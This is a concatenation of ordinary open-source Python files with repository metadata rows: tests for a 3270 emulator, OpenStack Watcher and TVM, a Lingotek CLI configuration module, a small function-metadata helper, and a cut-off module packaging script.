        "Mainframe3270.py3270.ExecutableAppWin.readline",
        side_effect=[
            b"data: abc",
            b"U U U N C 4 43 80 4 24 0x0 0.000",
            b"ok",
        ],
    )
    under_test = Emulator()
    assert not under_test.is_connected()
def test_is_connected_NotConnectedException(mock_windows):
    # With no patched I/O the status query fails; is_connected() must
    # report False rather than letting the exception escape.
    under_test = Emulator()
    assert not under_test.is_connected()
| 28.188889 | 83 | 0.721916 |
acf6c7911a3a0491c63c2ba632b5880a4413440b | 24,745 | py | Python | python2/ltk/actions/config_action.py | Lingotek/filesystem-connector | deca4cd2af41ee7a831404698eb1da70018c3556 | [
"MIT"
] | 11 | 2016-05-27T19:44:17.000Z | 2018-11-14T15:54:10.000Z | python2/ltk/actions/config_action.py | Lingotek/filesystem-connector | deca4cd2af41ee7a831404698eb1da70018c3556 | [
"MIT"
] | 10 | 2018-02-01T17:52:00.000Z | 2022-03-17T21:28:17.000Z | python2/ltk/actions/config_action.py | Lingotek/filesystem-connector | deca4cd2af41ee7a831404698eb1da70018c3556 | [
"MIT"
] | 6 | 2016-05-10T21:56:50.000Z | 2022-02-17T08:30:47.000Z | from ltk.actions.action import *
from tabulate import tabulate
class ConfigAction(Action):
    def __init__(self, path):
        """Load the project's config file for the given project path."""
        Action.__init__(self, path)
        self.config_file_name, self.conf_parser = self.init_config_file()
        # Cleared by setters on invalid input so the final summary table
        # in print_output() is skipped.
        self.print_config = True
    def config_action(self, **kwargs):
        """Apply every recognized config option in kwargs, then print a summary.

        Each option is delegated to its set_* helper; any exception is logged
        to the error file and reported without propagating to the caller.
        """
        try:
            if 'locale' in kwargs and kwargs['locale']:
                self.set_locale(kwargs['locale'])
            if 'workflow_id' in kwargs and kwargs['workflow_id']:
                self.set_workflow_id(kwargs['workflow_id'])
            if 'download_folder' in kwargs and kwargs['download_folder']:
                self.set_download_folder(kwargs['download_folder'])
            if 'latest_document' in kwargs and kwargs['latest_document']:
                self.set_always_check_latest_doc(kwargs['latest_document'])
            if 'clone_option' in kwargs and kwargs['clone_option']:
                self.set_clone_option(kwargs['clone_option'])
            if 'finalized_file' in kwargs and kwargs['finalized_file']:
                self.set_finalized_file_option(kwargs['finalized_file'])
            if 'unzip_file' in kwargs and kwargs['unzip_file']:
                self.set_unzip_file_option(kwargs['unzip_file'])
            if 'target_locales' in kwargs and kwargs['target_locales']:
                self.set_target_locales(kwargs['target_locales'])
            if 'locale_folder' in kwargs and kwargs['locale_folder']:
                self.set_locale_folder(kwargs['locale_folder'])
            if 'remove_locales' in kwargs and kwargs['remove_locales']:
                self.remove_locales(kwargs['remove_locales'])
            # Migrate older config files before the git-related options run.
            self.update_config_parser_info()
            if 'git' in kwargs and kwargs['git']:
                self.set_git_autocommit(kwargs['git'])
            if 'git_credentials' in kwargs and kwargs['git_credentials']:
                self.set_git_credentials()
            if 'append_option' in kwargs and kwargs['append_option']:
                self.set_append_option(kwargs['append_option'])
            if 'auto_format' in kwargs and kwargs['auto_format']:
                self.set_auto_format_option(kwargs['auto_format'])
            if 'metadata_prompt' in kwargs and kwargs['metadata_prompt']:
                self.set_metadata_prompt(kwargs['metadata_prompt'])
            if 'metadata_fields' in kwargs and kwargs['metadata_fields']:
                self.set_metadata_fields(kwargs['metadata_fields'])
            if 'metadata_defaults' in kwargs and kwargs['metadata_defaults']: #handle this last in case a prior argument caused an error
                self.set_metadata_defaults()
            self.print_output()
        except Exception as e:
            log_error(self.error_file_name, e)
            # NOTE(review): these substrings are assumed to identify responses
            # that mean the TMS API could not be reached -- confirm.
            if 'string indices must be integers' in str(e) or 'Expecting value: line 1 column 1' in str(e):
                logger.error("Error connecting to Lingotek's TMS")
            else:
                logger.error("Error on config: "+str(e))
    def print_output(self):
        """Print the project configuration summary table, then reset print_config.

        Skips the table if self.print_config was cleared by a setter; the flag
        is always re-armed before returning.
        """
        download_dir = "None"
        if self.download_dir and str(self.download_dir) != 'null':
            download_dir = self.download_dir
        locale_folders_str = "None"
        if self.locale_folders:
            # Render {"de_DE": path} as "de-DE": path for display.
            locale_folders_str = json.dumps(self.locale_folders).replace("{","").replace("}","").replace("_","-")
        current_git_username = self.conf_parser.get('main', 'git_username')
        current_git_password = self.conf_parser.get('main', 'git_password')
        # Summarize git auto-commit state plus which credentials are stored.
        git_output = ('active' if self.git_autocommit in ['True', 'on'] else 'inactive')
        if self.git_autocommit in ['True', 'on']:
            if current_git_username != "":
                git_output += (' (' + current_git_username + ', password:' + ('YES' if current_git_password != '' else 'NO')) + ')'
            else:
                git_output += (' (password:YES)' if current_git_password != '' else ' (no credentials set, recommend SSH key)')
        if self.print_config:
            # Display locales with dashes (de-DE) rather than underscores.
            watch_locales = set()
            for locale in self.watch_locales:
                watch_locales.add(locale.replace('_','-'))
            watch_locales = ','.join(target for target in watch_locales)
            if str(watch_locales) == "[]" or not watch_locales:
                watch_locales = "None"
            """ print ('Host: {0}\nLingotek Project: {1} ({2})\nLocal Project Path: {3}\nCommunity ID: {4}\nWorkflow ID: {5}\n'
                'Default Source Locale: {6}\nAlways Check Latest Document: {7}\nClone Option: {8}\nDownload Finalized Files: {9}\nAuto Format: {10}\nDownload Folder: {11}\nTarget Locales: {12}\nTarget Locale Folders: {13}\nGit Auto-commit: {14}\nAppend Option: {15}'.format(
                self.host, self.project_id, self.project_name, self.path, self.community_id, self.workflow_id, self.locale, self.clone_option, self.finalized_file, self.auto_format_option,
                download_dir, watch_locales, locale_folders_str, git_output, self.append_option)) """
            table = [
                ["Host", self.host],
                ["Lingotek Project", '{0} ({1})'.format(self.project_id, self.project_name)],
                ["Local Project Path", self.path],
                ["Community ID", self.community_id],
                ["Workflow ID", self.workflow_id],
                ["Default Source Locale", self.locale],
                ["Always Check Latest Document", self.always_check_latest_doc],
                ["Clone Option", self.clone_option],
                ["Download Finalized Files", self.finalized_file],
                ["Auto Format", self.auto_format_option],
                ["Default Download Folder", download_dir],
                ["Target Locales", watch_locales],
                ["Target Locale Folders", locale_folders_str],
                ["Git Auto-commit", git_output],
                ["Append Option", self.append_option.title()],
                ["Metadata Wizard Fields", ",\n".join(self.metadata_fields)],
                ["Always Prompt for Metadata", "on" if self.metadata_prompt else "off"],
                ["Default Metadata", "\n".join("{}:{}".format(key, value) for key, value in self.default_metadata.items())]
            ]
            if self.finalized_file == 'on':
                # The unzip option is only meaningful with finalized files on.
                table.append(["Unzip Finalized File", self.unzip_file])
            print("Configuration Options")
            print(tabulate(table))
        # Re-arm for the next invocation.
        self.print_config = True
def remove_locales(self, clear_locales):
log_info = "Removed all locale specific download folders."
self.locale_folders = {}
locale_folders_str = json.dumps(self.locale_folders)
self.update_config_file('locale_folders', locale_folders_str, self.conf_parser, self.config_file_name, log_info)
    def set_append_option(self, append_option):
        """Set how downloaded file locations are appended.

        Accepted values: 'none', 'full', 'number:<int>', 'name:<text>'.
        Invalid input logs a warning and suppresses the summary table.
        """
        self.print_config = True
        self.append_option = append_option
        # Valid when the value is a keyword, or starts with "number:"/"name:"
        # (the slice up to the first ':' captures the prefix).
        if append_option in {'none', 'full'} or append_option[:append_option.find(':')+1] in {'number:', 'name:'}:
            set_option = True
            if append_option[:3] == 'num':
                # "number:" is 7 chars; the remainder must parse as an int.
                try: int(append_option[7:])
                except ValueError:
                    logger.warning('Error: Input after "number" must be an integer')
                    self.print_config = False
            elif append_option[:4] == 'name' and len(append_option) <= 5:
                # "name:" alone (5 chars) carries no value.
                logger.warning('Error: No input given after "name"')
                self.print_config = False
            # Migrate older config files that predate this option.
            if not self.conf_parser.has_option('main', 'append_option'):
                self.update_config_file('append_option', 'none', self.conf_parser, self.config_file_name, 'Update: Added optional file location appending (ltk config --help)')
            if self.print_config:
                log_info = 'Append option set to ' + append_option
                self.update_config_file('append_option', append_option, self.conf_parser, self.config_file_name, log_info)
        else:
            logger.warning('Error: Invalid value for "-a" / "--append_option": Must be one of "none", "full", "number:", or "name:"')
            self.print_config = False
def set_auto_format_option(self, auto_format_option):
log_info = 'Turned auto format '+auto_format_option
if auto_format_option == 'on':
self.auto_format_option = 'on'
self.update_config_file('auto_format', auto_format_option, self.conf_parser, self.config_file_name, log_info)
elif auto_format_option == 'off':
self.auto_format_option = 'off'
self.update_config_file('auto_format', auto_format_option, self.conf_parser, self.config_file_name, log_info)
else:
logger.warning('Error: Invalid value for "-f" / "--auto_format": Must be either "on" or "off"')
print_config = False
def set_clone_option(self, clone_option, print_info=True):
self.clone_action = clone_option
if print_info:
log_info = 'Turned clone '+clone_option
else:
log_info = ''
if clone_option == 'on':
download_option = 'clone'
self.download_option = download_option
self.update_config_file('clone_option', clone_option, self.conf_parser, self.config_file_name, log_info)
self.update_config_file('download_option', download_option, self.conf_parser, self.config_file_name, '')
elif clone_option == 'off':
if self.download_dir == '':
new_download_option = 'same'
self.download_option = new_download_option
self.update_config_file('clone_option', clone_option, self.conf_parser, self.config_file_name, log_info)
self.update_config_file('download_option', new_download_option, self.conf_parser, self.config_file_name, '')
self.update_config_file('download_folder', self.download_dir, self.conf_parser, self.config_file_name, '')
else:
new_download_option = 'folder'
self.download_option = new_download_option
self.update_config_file('clone_option', clone_option, self.conf_parser, self.config_file_name, log_info)
self.update_config_file('download_option', new_download_option, self.conf_parser, self.config_file_name, '')
else:
logger.warning('Error: Invalid value for "-c" / "--clone_option": Must be either "on" or "off"')
print_config = False
def set_always_check_latest_doc(self, always_check_latest_doc_option, print_info=True):
if print_info:
log_info = 'Turned always check latest document ' + always_check_latest_doc_option
else:
log_info = ''
if always_check_latest_doc_option == 'on' or always_check_latest_doc_option == 'off':
self.update_config_file('always_check_latest_doc', always_check_latest_doc_option, self.conf_parser, self.config_file_name, log_info)
else:
logger.warning('Error: Invalid value for "-ld" / "--latest_document": Must be either "on" or "off"')
    def set_finalized_file_option(self, finalized_file, print_info=True):
        """Turn downloading of finalized files on or off.

        When turned on, the user is also prompted for the unzip option.
        """
        if finalized_file:
            finalized_file = finalized_file.lower()
        if print_info:
            log_info = 'Turned finalized file download ' + finalized_file
        else:
            log_info = ''
        if finalized_file == 'on' or finalized_file == 'off':
            self.finalized_file = finalized_file
            self.update_config_file('finalized_file', finalized_file, self.conf_parser, self.config_file_name, log_info)
            if self.finalized_file == 'on':
                # Unzip only matters for finalized files, so ask now.
                unzip_file = self.prompt_unzip_file_option()
                self.set_unzip_file_option(unzip_file)
        else:
            logger.warning('Error: Invalid value for "-ff" / "--finalized_file": Must be either "on" or "off"')
            self.print_config = False
    def prompt_unzip_file_option(self):
        """Interactively ask whether finalized files should be unzipped.

        Returns 'on' (default, also on empty input) or 'off'.
        NOTE(review): on Ctrl-C this returns None, which the caller passes to
        set_unzip_file_option -- confirm that path is intended.
        """
        unzip_file = 'on'
        try:
            confirm = 'none'
            while confirm not in ['on', 'On', 'ON', 'off', 'Off', '']:
                prompt_message = 'Would you like to turn finalized file UNZIP on or off? [ON/off]: '
                # Python 2
                confirm = raw_input(prompt_message)
                # End Python 2
                # Python 3
                # confirm = input(prompt_message)
                # End Python 3
            if confirm in ['on', 'On', 'ON', 'off', 'Off', '']:
                if confirm in ['on', 'On', 'ON', '']:
                    unzip_file = 'on'
                else:
                    unzip_file = 'off'
        except KeyboardInterrupt:
            # Python 2
            logger.info("\nInit canceled")
            # End Python 2
            # Python 3
            # logger.error("\nInit canceled")
            # End Python 3
            return
        return unzip_file
    def set_unzip_file_option(self, unzip_file, print_info=True):
        """Turn unzipping of finalized files on or off ('on'/'off')."""
        if unzip_file:
            unzip_file = unzip_file.lower()
        if print_info:
            log_info = 'Turned finalized file unzip ' + unzip_file
        else:
            log_info = ''
        if unzip_file == 'on' or unzip_file == 'off':
            self.unzip_file = unzip_file
            self.update_config_file('unzip_file', unzip_file, self.conf_parser, self.config_file_name, log_info)
        else:
            logger.warning('Error: Invalid value for "-u" / "--unzip_file": Must be either "on" or "off"')
            self.print_config = False
def set_download_folder(self, download_folder):
if download_folder == '--none':
if self.download_dir == "":
pass
else:
new_download_option = 'same'
self.download_option = new_download_option
self.update_config_file('download_folder',"", self.conf_parser, self.config_file_name, "")
if self.download_option != 'clone':
if self.watch_locales != None and len(self.locale_folders) != 0:
new_download_option = 'folder'
else:
new_download_option = 'same'
self.download_option = new_download_option
log_info = 'Removed download folder'
self.update_config_file('download_option', new_download_option, self.conf_parser, self.config_file_name, log_info)
else:
download_path = self.norm_path(download_folder)
if os.path.exists(os.path.join(self.path,download_path)):
self.download_dir = download_path
log_info = 'Set download folder to {0}'.format(download_path)
self.update_config_file('download_folder', download_path, self.conf_parser, self.config_file_name, log_info)
if self.download_option != 'clone':
new_download_option = 'folder'
self.download_option = new_download_option
self.update_config_file('download_option', new_download_option, self.conf_parser, self.config_file_name, "")
else:
logger.warning('Error: Invalid value for "-d" / "--download_folder": The folder {0} does not exist'.format(os.path.join(self.path,download_path)))
print_config = False
def set_git_autocommit(self, git_autocommit):
# if self.git_autocommit == 'True' or self.git_auto.repo_exists(self.path):
# log_info = 'Git auto-commit status changed from {0}active'.format(
# ('active to in' if self.git_autocommit == "True" else 'inactive to '))
# config_file = open(self.config_file_name, 'w')
# if self.git_autocommit == "True":
# self.update_config_file('git_autocommit', 'False', self.conf_parser, self.config_file_name, log_info)
# self.git_autocommit = "False"
# else:
# self.update_config_file('git_autocommit', 'True', self.conf_parser, self.config_file_name, log_info)
# self.git_autocommit = "True"
self.git_autocommit = git_autocommit
log_info = 'Turned git auto-commit ' + git_autocommit
if git_autocommit in ['on', 'off']:
self.update_config_file('git_autocommit', git_autocommit, self.conf_parser, self.config_file_name, log_info)
else:
logger.warning('Error: Invalid value for "-g" / "--clone_option": Must be either "on" or "off"')
print_config = False
    def set_git_credentials(self):
        """Prompt for git credentials and store them (password encrypted).

        Entering 'none'/'N'/'--none' clears a credential. Skipped entirely on
        Windows (os.name == 'nt'), where only SSH key access is supported.
        """
        if "nt" not in os.name:
            # Python 2
            git_username = raw_input('Username (Username and password are not required if SSH is enabled): ')
            # End Python 2
            # Python 3
            # git_username = input('Username (Username and password are not required if SSH is enabled): ')
            # End Python 3
            git_password = getpass.getpass()
            if git_username in ['None', 'none', 'N', 'n', '--none']:
                git_username = ""
                log_info = "Git username disabled"
            else:
                log_info = 'Git username set to ' + git_username
            self.update_config_file('git_username', git_username, self.conf_parser, self.config_file_name, log_info)
            if git_password in ['None', 'none', 'N', 'n', '--none']:
                git_password = ""
                log_info = "Git password disabled"
            else:
                log_info = 'Git password set'
            # Password is stored encrypted via the git helper, never raw.
            self.update_config_file('git_password', self.git_auto.encrypt(git_password), self.conf_parser, self.config_file_name, log_info)
        else:
            # NOTE(review): `error` is presumably imported via the wildcard
            # import from ltk.actions.action -- verify.
            error("Only SSH Key access is enabled on Windows")
            git_username = ""
            git_password = ""
def set_locale(self, locale):
self.locale = locale
log_info = 'Project default locale has been updated to {0}'.format(self.locale)
self.update_config_file('default_locale', locale, self.conf_parser, self.config_file_name, log_info)
def set_locale_folder(self, locale_folders):
count = 0
folders_count = len(locale_folders)
folders_string = ""
log_info = ""
mult_folders = False
for folder in locale_folders:
count += 1
if not folder[0] or not folder[1]:
logger.warning("Please specify a valid locale and a directory for that locale.")
print_config = False
continue
locale = folder[0].replace("-","_")
if not is_valid_locale(self.api, locale):
logger.warning(str(locale+' is not a valid locale. See "ltk list -l" for the list of valid locales'))
print_config = False
continue
if folder[1] == '--none':
folders_count -= 1
if locale in self.locale_folders:
self.locale_folders.pop(locale, None)
logger.info("Removing download folder for locale "+str(locale)+"\n")
else:
logger.info("The locale "+str(locale)+" already has no download folder.\n")
print_config = False
continue
path = self.norm_path(os.path.abspath(folder[1]))
if os.path.exists(os.path.join(self.path,path)):
taken_locale = self.is_locale_folder_taken(locale, path)
if taken_locale:
logger.info("The folder "+str(path)+" is already taken by the locale "+str(taken_locale)+".\n")
print_config = False
continue
else:
# print("path of new locale folder: "+path)
self.locale_folders[locale] = path
else:
logger.warning('Error: Invalid value for "-p" / "--locale_folder": Path "'+path+'" does not exist')
print_config = False
continue
folders_string += str(locale) + ": " + str(path)
if count < len(locale_folders):
folders_string += ", "
if len(folders_string):
if folders_count > 1:
log_info = 'Adding locale folders {0}'.format(folders_string)
else:
log_info = 'Adding locale folder for {0}'.format(folders_string)
locale_folders_str = json.dumps(self.locale_folders)
self.update_config_file('locale_folders', locale_folders_str, self.conf_parser, self.config_file_name, log_info)
def set_target_locales(self, target_locales):
locales = []
print(target_locales)
for locale in target_locales:
locales.extend(locale.split(','))
if len(locales) > 0 and (locales[0].lower() == 'none' or locales[0].lower() == '--none'):
log_info = 'Removing all target locales'
self.update_config_file('watch_locales', '', self.conf_parser, self.config_file_name, log_info)
else:
target_locales = get_valid_locales(self.api,locales,'added')
target_locales_str = ','.join(target for target in target_locales)
if len(target_locales_str) > 0:
log_info = 'Set target locales to {0}'.format(target_locales_str)
self.update_config_file('watch_locales', target_locales_str, self.conf_parser, self.config_file_name, log_info)
self.watch_locales = target_locales
    def set_workflow_id(self, workflow_id):
        """Change the workflow used when uploading content."""
        self.workflow_id = workflow_id
        log_info = 'Workflow used to upload content has been changed to {0}.'.format(workflow_id)
        self.update_config_file('workflow_id', workflow_id, self.conf_parser, self.config_file_name, log_info)
        # NOTE(review): this extra set looks redundant with update_config_file
        # above -- confirm whether update_config_file already writes the parser.
        self.conf_parser.set('main', 'workflow_id', workflow_id)
    def update_config_parser_info(self):
        """Migrate older config files: add git options if they are missing."""
        # clone_option = self.conf_parser.get('main', 'clone_option')
        # download_folder = self.conf_parser.get('main', 'download_folder')
        # download_option = self.conf_parser.get('main', 'download_option')
        # if 'download_option' == 'same' or (clone_option == "off" and download_folder == "null"):
        #     self.update_config_file('download_option', 'folder', self.conf_parser, self.config_file_name, "")
        if not self.conf_parser.has_option('main', 'git_autocommit'):
            # First run after upgrade: seed the three git-related keys.
            self.update_config_file('git_autocommit', 'False', self.conf_parser, self.config_file_name, 'Update: Added \'git auto-commit\' option (ltk config --help)')
            self.update_config_file('git_username', '', self.conf_parser, self.config_file_name, 'Update: Added \'git username\' option (ltk config --help)')
            self.update_config_file('git_password', '', self.conf_parser, self.config_file_name, 'Update: Added \'git password\' option (ltk config --help)')
        self.git_autocommit = self.conf_parser.get('main', 'git_autocommit')
def set_metadata_defaults(self):
self.default_metadata = self.metadata_wizard(set_defaults=True)
self.update_config_file('default_metadata', json.dumps(self.default_metadata), self.conf_parser, self.config_file_name, "Updated default metadata to {0}".format(self.default_metadata))
def set_metadata_prompt(self, option):
if option.lower() == 'on':
self.metadata_prompt = True
self.update_config_file('metadata_prompt', 'on', self.conf_parser, self.config_file_name, 'Update: Metadata prompt set to ON')
elif option.lower() == 'off':
self.metadata_prompt = False
self.update_config_file('metadata_prompt', 'off', self.conf_parser, self.config_file_name, 'Update: Metadata prompt set to OFF')
else:
logger.warning("The flag for the metadata prompt only takes the arguments 'on' or 'off'")
def set_metadata_fields(self, fields):
if fields.lower() == 'all':
self.metadata_fields = METADATA_FIELDS
else:
new_fields = fields.split(",")
if len(new_fields) == 0 or fields.isspace():
logger.error("You must set at least one field")
return
for field in new_fields:
if field not in METADATA_FIELDS:
logger.warning("{0} is not a valid metadata field".format(field))
return
self.metadata_fields = new_fields
self.update_config_file('metadata_fields', json.dumps(self.metadata_fields), self.conf_parser, self.config_file_name, "Updated metadata wizard fields to {0}".format(self.metadata_fields)) | 54.028384 | 274 | 0.60982 |
acf6c805c77628d5255b7f28916b6757a115cd12 | 1,947 | py | Python | python-watcher-2.0.0/watcher/tests/applier/test_rpcapi.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | null | null | null | python-watcher-2.0.0/watcher/tests/applier/test_rpcapi.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | python-watcher-2.0.0/watcher/tests/applier/test_rpcapi.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | # -*- encoding: utf-8 -*-
# Copyright (c) 2015 b<>com
#
# Authors: Jean-Emile DARTOIS <jean-emile.dartois@b-com.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import mock
import oslo_messaging as om
from watcher.applier import rpcapi
from watcher.common import exception
from watcher.common import utils
from watcher.tests import base
class TestApplierAPI(base.TestCase):
api = rpcapi.ApplierAPI()
def test_get_api_version(self):
with mock.patch.object(om.RPCClient, 'call') as mock_call:
expected_context = self.context
self.api.check_api_version(expected_context)
mock_call.assert_called_once_with(
expected_context,
'check_api_version',
api_version=rpcapi.ApplierAPI().API_VERSION)
def test_execute_audit_without_error(self):
with mock.patch.object(om.RPCClient, 'cast') as mock_cast:
action_plan_uuid = utils.generate_uuid()
self.api.launch_action_plan(self.context, action_plan_uuid)
mock_cast.assert_called_once_with(
self.context,
'launch_action_plan',
action_plan_uuid=action_plan_uuid)
def test_execute_action_plan_throw_exception(self):
action_plan_uuid = "uuid"
self.assertRaises(exception.InvalidUuidOrName,
self.api.launch_action_plan,
action_plan_uuid)
| 34.767857 | 71 | 0.691834 |
acf6c8c50aff9841b8bb031ffdb01db1afb46aa4 | 1,513 | py | Python | tests/python/relay/test_pass_profiler.py | eleflea/tvm | d199243d8907b2d8062dd9c20b69dcb9765a970f | [
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 40 | 2021-06-14T23:14:46.000Z | 2022-03-21T14:32:23.000Z | tests/python/relay/test_pass_profiler.py | eleflea/tvm | d199243d8907b2d8062dd9c20b69dcb9765a970f | [
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 14 | 2021-06-08T03:15:54.000Z | 2022-02-01T23:50:24.000Z | tests/python/relay/test_pass_profiler.py | eleflea/tvm | d199243d8907b2d8062dd9c20b69dcb9765a970f | [
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 11 | 2021-06-14T05:56:18.000Z | 2022-02-27T06:52:07.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
import tvm.relay
from tvm.relay import op
def test_pass_profiler():
x, y, z = [tvm.relay.var(c, shape=(3, 4), dtype="float32") for c in "xyz"]
e1 = op.add(x, y)
e2 = op.subtract(x, z)
e3 = op.multiply(e1, e1 / e2)
mod = tvm.IRModule.from_expr(e3 + e2)
tvm.transform.enable_pass_profiling()
mod = tvm.relay.transform.AnnotateSpans()(mod)
mod = tvm.relay.transform.ToANormalForm()(mod)
mod = tvm.relay.transform.InferType()(mod)
profiles = tvm.transform.render_pass_profiles()
assert "AnnotateSpans" in profiles
assert "ToANormalForm" in profiles
assert "InferType" in profiles
tvm.transform.clear_pass_profiles()
tvm.transform.disable_pass_profiling()
| 36.02381 | 78 | 0.731659 |
acf6c92383a1f136c194d282b833ad41d8d32599 | 613 | py | Python | kao_fn/function_metadata.py | cloew/KaoFn | e9e0742c9a46e6dc749e48a684ed7c4f82a06173 | [
"MIT"
] | null | null | null | kao_fn/function_metadata.py | cloew/KaoFn | e9e0742c9a46e6dc749e48a684ed7c4f82a06173 | [
"MIT"
] | null | null | null | kao_fn/function_metadata.py | cloew/KaoFn | e9e0742c9a46e6dc749e48a684ed7c4f82a06173 | [
"MIT"
] | null | null | null | from .smart_arg import SmartArg
import inspect
class FunctionMetadata:
    """ Represents a function's metadata: argument names, positions and defaults """
    def __init__(self, func):
        """ Initialize the metadata by introspecting *func*'s signature

        :param func: the function (or other callable) to inspect
        """
        # inspect.getargspec was deprecated since Python 3.0 and removed in
        # Python 3.11; getfullargspec exposes the same positional args and
        # defaults (and additionally tolerates annotations/keyword-only args).
        spec = inspect.getfullargspec(func)
        args, defaults = spec.args, spec.defaults
        # Map each argument name to its positional index; enumerate avoids the
        # quadratic list.index lookup of the original implementation.
        self.argNameToIndex = {arg: index for index, arg in enumerate(args)}
        # Defaults align with the *last* len(defaults) arguments, hence the
        # reversed zip.
        self.nameToDefaultValue = dict(zip(reversed(args), reversed(defaults))) if defaults is not None else {}
        self.args = [SmartArg(arg, self.argNameToIndex[arg]) for arg in args]
        self.nameToArg = {arg.argName: arg for arg in self.args}
acf6ca6881f627ab8f80fa2979c2dab0c6e95cc7 | 6,726 | py | Python | client/package.py | mikaelbrandin/armory | 222e549fbf2cf89a874cad96a8bb7edd186e4800 | [
"Apache-2.0"
] | null | null | null | client/package.py | mikaelbrandin/armory | 222e549fbf2cf89a874cad96a8bb7edd186e4800 | [
"Apache-2.0"
] | null | null | null | client/package.py | mikaelbrandin/armory | 222e549fbf2cf89a874cad96a8bb7edd186e4800 | [
"Apache-2.0"
] | null | null | null | __author__ = 'kra869'
import hashlib
import os
import tarfile
import shutil
import datetime
import tempfile
import glob
from . import utils
import configparser
from . import configurations
class PackageException(BaseException):
    """Raised when packaging a module or configuration fails.

    Deriving from BaseException is kept for backward compatibility with the
    existing ``except PackageException`` handlers, although Exception would
    normally be the preferred base class.
    """
    def __init__(self, msg):
        # Forward msg to BaseException so str(exc) and tracebacks show the
        # message (the original stored only .msg, leaving str(exc) empty).
        super().__init__(msg)
        self.msg = msg
def init(context):
    """Register the 'package' sub-command and its CLI arguments on *context*."""
    package_parser = context.register_command(
        'package', command_package, help='Package a module or configurations')
    package_parser.add_argument(
        'sources', metavar='DIRECTORY', nargs='+', help='TBD')
    package_parser.add_argument(
        '--file', '-f', metavar='FILE', help='Write package to FILE')
    return None
def command_package(args, context):
    """Entry point for the 'package' sub-command.

    Each entry in args.sources is either a known module name or a directory
    containing one or more ``*.info`` descriptor files; every descriptor is
    packaged as a configuration or a module depending on its
    ``[general] type`` option.
    """
    modules = context.modules.from_context(context)
    for src in args.sources:
        if src in modules:
            # NOTE(review): package_module takes (args, context, info, module)
            # but only three arguments are passed here -- this call would raise
            # TypeError if ever reached. Confirm the intended signature.
            package_module(args, context, modules[src])
        elif os.path.exists(src) and os.path.isdir(src):
            # Normalise the directory path so the glob below matches files in it.
            if not src.endswith(os.sep):
                src = src + os.sep
            dir = src
            for file in glob.glob(dir + '*.info'):
                # NOTE(review): SafeConfigParser is a deprecated alias of
                # ConfigParser and was removed in Python 3.12.
                info = configparser.SafeConfigParser()
                info.read(file)
                # Package name = descriptor basename without the ".info" suffix.
                name = os.path.splitext(os.path.basename(file))[0]
                # name =
                print("Packaging " + name)
                if info.has_option("general", "type") and info.get('general', 'type') == 'configuration':
                    package_config(args, name, info, configurations.Configuration(configurations.to_name(name), dir, context))
                else:
                    # NOTE(review): 'modules' here is the dict bound above, which
                    # shadows any imported 'modules' package, so this attribute
                    # access looks unintended -- verify.
                    package_module(args, name, info, modules.Module(name, dir, context))
                # module =
                # package_module(args, context, module)
        else:
            raise PackageException("Missing source, nothing to package")
    # for mod_name in included:
    #     commit(args, context, modules[mod_name])
def package_config(args, context, info, config):
    """Build a ``<name>-<version>.pack`` tar archive for a configuration.

    The archive contains the configuration directory's files plus a
    MANIFEST of per-file sha1 hashes and a METAINF section describing the
    package.

    :param args: parsed CLI arguments (only ``args.file`` is used here)
    :param context: NOTE(review): the caller actually passes the package
        *name* in this position and the value is never used -- confirm
        the intended signature
    :param info: ConfigParser holding the ``*.info`` descriptor contents
    :param config: configuration object exposing name, friendly_name and
        conf_directory
    """
    # NOTE(review): info.get raises NoOptionError before the friendlier
    # PackageException below can fire when 'version' is missing -- the
    # has_option check should come first.
    version = info.get('general', 'version')
    if not info.has_option('general', 'version'):
        raise PackageException('No version, please provide a valid version tag in config .info file for ' + config.name)
    print(config.name + "(" + version + ") from " + config.conf_directory)
    # Create temporary directory
    # NOTE(review): the temp dir is only removed at the end of the happy
    # path; any exception below leaks it (no try/finally).
    dir = tempfile.mkdtemp('am-package') + os.sep
    if not os.path.exists(dir):
        os.makedirs(dir);
    tmp_pack = dir + config.name + '.pack'
    tmp_manifest = dir + 'MANIFEST'
    tmp_metainfo = dir + 'METAINF'
    # Create MANIFEST
    # The package hash is a sha1 over every "<relpath> sha1 <filehash>" entry.
    package_hash = hashlib.sha1()
    with open(tmp_manifest, 'w+') as manifest:
        for root, dirs, files in os.walk(config.conf_directory, topdown=False):
            for name in files:
                f = os.path.join(root, name)
                rel = os.path.relpath(f, config.conf_directory)
                hv = utils.hash_file(f)
                print("  " + hv + "\t" + rel)
                data = rel + " sha1 " + hv
                data = data.encode('utf-8')
                package_hash.update(data)
                manifest.write(rel + " sha1 " + hv + "\n")
    package_hash = package_hash.hexdigest()
    # Create METAINF
    # NOTE(review): SafeConfigParser is deprecated (removed in Python 3.12)
    # and os.getlogin() can raise OSError when no controlling terminal exists.
    metainfo = configparser.SafeConfigParser()
    metainfo.add_section('meta')
    metainfo.set('meta', 'name', config.name)
